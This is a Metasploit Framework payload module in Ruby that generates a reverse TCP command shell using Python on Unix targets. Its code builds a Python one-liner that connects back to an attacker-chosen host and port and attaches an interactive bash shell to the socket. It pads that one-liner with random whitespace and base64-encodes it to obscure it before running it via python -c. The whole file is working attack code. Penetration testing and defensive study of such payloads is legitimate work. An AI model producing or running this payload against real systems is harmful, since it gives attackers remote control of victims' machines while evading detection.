## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' module Metasploit3 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix Command Shell, Reverse TCP (via Python)', 'Version' => '$Revision: 1 $', 'Description' => 'Connect back and create a command shell via Python', 'Author' => 'Brendan Coles ', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Handler' => Msf::Handler::ReverseTcp, 'Session' => Msf::Sessions::CommandShell, 'PayloadType' => 'cmd', 'RequiredCmd' => 'python', 'Payload' => { 'Offsets' => {}, 'Payload' => '' } )) register_options([ OptString.new('SHELL', [true, 'The system shell to use.', '/bin/bash']) ], self.class) end def generate return super + command_string end # # Generate random whitespace # def random_padding " "*rand(10) end # # Generate command string # def command_string raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"#{datastore['SHELL']}\",\"-i\"]);" obfuscated_cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}") encoded_cmd = Rex::Text.encode_base64(obfuscated_cmd) "python -c \"exec('#{encoded_cmd}'.decode('base64'))\"" end end